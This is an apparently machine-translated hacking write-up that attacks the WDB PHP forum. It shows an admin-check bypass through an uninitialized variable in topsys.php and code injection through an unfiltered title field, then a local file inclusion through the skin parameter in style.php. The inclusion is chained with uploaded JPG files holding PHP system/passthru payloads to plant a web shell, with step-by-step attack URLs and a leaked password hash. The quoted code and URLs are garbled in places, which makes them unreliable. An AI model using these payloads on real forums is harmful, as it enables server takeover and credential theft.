========================================================== ========
Send this article to my friend Bytes only,
And wish him and his girlfriend Lu Zi a true love for life, grow old
========================================================== ========
Preface:
When talking about WEB security with many network administrators, many people tell me that WEB security is SQL injection. "Isn't it your SQL statement embedded behind a variable, I will also ". This is what I hear most people know about WEB security. Is WEB security just SQL injection, of course not! SQL injection is just the tip of the iceberg. People who think injection is WEB security. Open your eyes and show me how to slap your face with actual actions!
Description:
Recently, I was reading the WDB forum. This forum is very nice and elegant, and similar to LB5. However, security is not flattering. If I say that on average, five files have a vulnerability, that is not an exaggeration at all. Although the author seems to have intentionally taken some measures, the filtering is not very strict. As a result, malicious or atypical malicious users can write their own code, and then execute their own statements to control the entire system.
I. topsys. php global variables are not initialized, resulting in control of the entire Forum
1. Vulnerability Analysis
Topsys. php is the file used by administrators to centrally manage the top posts of forums. This file can be used to implement operations such as the top-down, clearing, and deleting of Forum posts. It is such a small file, since programmers do not initialize some of the variables, they can control the entire forum and even the entire control system.
Let's take a look at how to bypass the restrictions first. Some code is as follows:
========= Codz begin ================
13 if ($ login_status = 1 & ($ username = $ admin_name | ($ manager & in_array ($ username, $ manager )))) {$ announceadmin = 1 ;}
14 // ---- give the added administrator the right to manage! ----------
15 if (file_exists ("datafile/admin_user.php ")){
16 include ("datafile/admin_user.php ");
17 if ($ admin_user & in_array ($ username, $ admin_user )){
18 $ announceadmin = 1;
19}
20}
21 // ---- give the added administrator the right to manage! ----------
22 $ musia = 0;
23 if ($ announceadmin = 1) $ musia = 1;
========= Codz endz ==================
We can see from the 13th row check that this code is used to determine whether there is administrator permission. If so, set the $ announceadmin variable to 1, later, the Administrator did not forget to initialize $ musia, and then checked whether the $ announceadmin variable is 1. If it is 1, then set the $ musia variable to true. Let's skip it here and look at it later.
Let's take a look at the Code:
========= Codz begin ================
150 if ($ job = "write "){
151 if ($ announceadmin! = 1) {require ("header. php ");
152 echo "Sorry, you have not logged in or your identity is incorrect. Please <a href = 'javascript: history. back (1); '> return to check </a> ";
153 require ("footer. php ");
154 exit ;}
// Perform the top-down operation later ......
========= Codz endz ==================
How does a program verify the Administrator identity? Programmers rely on a value for determination. Here, he checks whether the announceadmin variable is 1. If it is not 1, an error is reported indicating that the identity is incorrect (not the administrator ). Okay. Let's go back and look at the seemingly rigorous verification. What do you think? You may find that the value used to check whether the Administrator has permissions is not initialized. If we directly construct the statement to submit $ announceadmin = 1. We can use the administrator privilege to publish and delete top posts. Let's try and submit it.
Http://bbs.target.com/topsys.php? Announceadmin = 1
We can see what is different from the previous one. We have added the administrator management module, so we can find a post-subsystem, and submit the URL as follows:
Http://bbs.target.com/topsys.php? Announcea... tent = hello, this is Jambalaya & title = wdbread. php? Forumid = 1 & filename = f_27. Here we create the top 27th posts in the first forum titled "hello, this is Jambalaya. Press enter. Haha, we have succeeded. Here we can use the same method to delete and clear the top posts of the general system. It is a waste of time to analyze them here. Let's take a look. After a while, I thought about it. How can we control the entire website? HOHO ~~ The real attack is here... Come with me ~~~~~
The above is nothing but the ability to pin, clear, and delete posts with the Administrator's identity. Nothing else can be done, but we have successfully bypassed the Administrator's permission verification, after bypassing, we are different. Do not believe it? Haha, wait and see...
Let's look at the following code:
========= Codz begin ================
165 if (file_exists ("datafile/topsys. php") $ msg = file ("datafile/topsys. php ");
166 else $ msg [0] = "";
167
168 $ content = stripslashes (safe_convert ($ content ));
169 $ title = stripslashes (safe_convert ($ title ));
170 $ title = "". $ title;
171 if ($ filename) $ title = $ title. "& filename =". $ filename; // for wdbread. php
172 $ new = "$ user | $ title | $ timestamp | $ content | $ member \ n ";
173
174 $ oldcount = count ($ msg );
175 if ($ oldcount> $ msgg_max ){
176 for ($ I = $ msgg_max; $ I <$ oldcount; $ I ++) unset ($ msg );
177}
178
179 $ old = implode ("", $ msg );
180 writetofile ("datafile/topsys. php", $ new. $ old );
========= Codz endz ==================
These are what we can see when we get the Administrator permission. Let's see if datafile/topsys. php exists first. This file is used to record top posts. Okay. Let's see what he writes? Writetofile ("datafile/topsys. php ", $ new. $ old) from this sentence, we can see that. $ old write topsys. in php, while $ new = "$ user | $ title | $ timestamp | $ content | $ member \ n", where $ user and $ timestamp are fixed, $ title and $ content seem to be usable, but the safe_convert function looks a little scary. But for safe people, carefulness and endurance are indispensable. Otherwise, the so-called good luck will not take the initiative to find you. In order not to let go of a detail, let's take a look at this function to see if there are loose filtering. So go to global. php to find this function:
========= Codz begin ================
837 function safe_convert ($ d ){
838 $ d = str_replace ("\ t", "", $ d );
839 $ d = str_replace ("<", "<", $ d );
840 $ d = str_replace (">", ">", $ d );
841 $ d = str_replace ("\ r", "<br>", $ d );
842 $ d = str_replace ("\ n", "", $ d );
$843 d = str_replace ("|", "│", $ d );
$844 d = str_replace ("", "", $ d );
845 return $ d;
846}
========= Codz endz ==================
After reading it, I got a cold sweat, and the filter was very strict. Several important characters were basically wiped out by him. It seems that it is unlikely that you can find a place to filter your words. Go back and check the other variables. The rest is $ member, and the context is scanned. Well, we can control this. We use this value to write our own code into the file.
Hello! Wait! Wait! In fact, we can start writing attack methods here, but we can stop it. Let's take a closer look at our code and my analysis process. In fact, there is something we ignore here. Have you noticed it? No? Check again.
Suppose the $ member variable is also filtered out. What can we do? Take a closer look. In fact, the $ title variable is not actually filtered out. The programmer made a serious logical error here. It is correct for him to filter $ title from the beginning, but he assigned a value to $ title again after filtering. This is incorrect. Let's take a look at this sentence: "if ($ filename) $ title = $ title. "& filename = ". $ filename ". After strictly filtering the title, he assigned a new value to the title variable, and the new value was not filtered. We can use this new value to write our own code. It is as if a defender has a solid shield, dug a large hole in the middle of the shield, and then said to the archer, "okay, you can set an arrow ".
It can be seen from this that the failure to pay attention to any details will lead to the collapse of your defense.
2. attack methods
The analysis is complete. "The gentleman does not need to speak". Come on, get started ~~~~
Since we can write code into it, What should we write? After 0.001 seconds of thinking, I decided to write a shell. We need to write everything at once. Register a user first:
Username: Jambalaya
Password: itaq.org
Then I posted a post titled "test me" with the content "I am Jambalaya and I am from www.itaq.org. You have time to come and play ". Haha, submit the following URL:
Http://bbs.target.com/topsys.php? Announcea... #036; jam) ;?>
Then access the http://bbs.target.com/topsys.php directly? Jam = dir. How about it? A shell is made up ~~~~
Dir: Check the Directory and see that user_jkljkl is the directory for saving the user. Submit the URL:
'Target = '_ blank'> http://bbs.target.com/user_jkljkl/username ,?.... No rabbit? P
However, this is too easy to be discovered. You can first unload the other party's general post, and then write a shell to it.
What should I do if the title variable is not fully filtered? Let's give IT a try. After all, understanding and understanding are two different things. understanding and application are two different things. In the IT Security Forum, we have a mantra, which is from our friend SystEm32. I like IT very much, I am sorry if you have never practiced it. You are not qualified to speak! "
2. Style. php files are not filtered.
Next, let's take a look at the style. php file. The variables in this file are not filtered. As a result, malicious attackers can execute their own malicious code to control the entire website.
Test environment: iis5.0 + windows2000
1. Specific Vulnerabilities
Description:
Let's take a look at the relevant code of style. php:
========= Codz begin ================
<?
If (empty ($ skin) $ skin = crystal classic;
If (file_exists ("datafile/style/". $ skin) include ("datafile/style/". $ skin );
Else include ("datafile/style/crystal classic ");
========= Codz ends ======================
The original intent of the code is to set the appearance style of the Forum. If the skin variable is not empty, set skin. If the skin file under datafile/style/exists, include the file. We noticed that the skin variable in the Code is not checked, that is, we can perform any operation or use ".. /",". /"to jump to any directory or include any files we specify.
So how can we do it now? We know that include can be used to explain and execute PHP file code. Even if it is saved as an image, the subsequent steps are much simpler. First, we need to upload an image, different WDB versions have different upload methods. Some Chinese versions can upload portraits, some can only upload attachments, and I can only upload attachments in this crystal forum, in addition, you need to post a certain amount of posts. After posting the post, I found that I could upload the attachment. Upload an attachment and see the Forum save it as upload/forum%f_23_978374564.jpg. Now some friends may want to write a PHP Trojan in the jpg file and then use include to explain the execution. this is not feasible. include can indeed explain the code in jpg, But if you cannot accept the variable sent by GET after the question mark.
We can directly use a probe to find the directory for storing the user and directly write the content in the jpg file. <? Passthru ("dir");?>, Directly request http://bbs.target.com/myhome/wdb/datafile/style.php in url? Skin = .. /.. /.. /upload/forum1_f_23_978374564.jpg, and then obtain the absolute path based on the returned value. For example, the absolute path I get is F: \ myhome \ wdb \ datafile, by the way, I got all the files in it, and then I uploaded an image, which was written to <? Passthru ("dir f: \ myhome \ wdb")?>, Request a http://bbs.target.com/myhome/wdb/datafile/style.php again in the URL? Skin = .. /.. /.. /upload/forum1_f_23_978374564.jpg. The directory and file in f: \ myhome \ wdb are returned, and the user directory is found. user_jkljkl is found, and the request token is submitted in the URL:
Jambalaya | eed8sp_400dfd4ec85dff70a170066b7 | jam@itaq.org | 1083116258 | 1084002908 | 2 | none | 998.4 |
1084150077 | 1084150372 | 1068 | jam | wdbread. php? Forumid = 1 & filename = f_13 | 1 | 192.168.0.13
The password for Jambalaya is eed8gj400dfd4ec85dff70a170066b7.
Let me get a shell and write it in another file <? System ($ a);?>, Save it as a jpg file for upload. The path is upload/forum1_f_24_978374654.jpg. What is the content of a File Uploaded? Rename "f :\\ myhome \ wdb \ upload \ forum1_f_24_978374654.jpg", "jam. php"?> Save the image as upload/forum1_f_25_978374773.jpg. In the URL, directly call http: // 192.168.0.13/myhome/wdb/datafile/style. php? Skin = .. /.. /.. /upload/forum1_f_25_978374773.jpg. In this way, execute our command to directly change the suffix to php, and then call our statement to get a shell.
Iii. Conclusion:
Now the article has been written, and the preparation for finishing the work is still the old saying: we don't want everyone to attack others.
Here, we must emphasize the existence of Forum vulnerabilities, not only the Forum itself, but the overall system security!
I have discovered these vulnerabilities earlier. At the beginning, I only talked with you in the internal version of itaq.org and did not intend to announce them. Not long ago, I met a predecessor named lovehacker. He told me that only constant communication can be improved. Those who are not willing to share things with others will not be able to improve. He shares his experience of discovering Server Vulnerabilities unselfishly. His spirit of sharing left me alone. Here I would like to thank lovehacker for his teaching.
The text is too hasty and the technology is limited. If there is any mistake in the text, I would like to ask the experts to correct them in person at www.itaq.org. I am very grateful.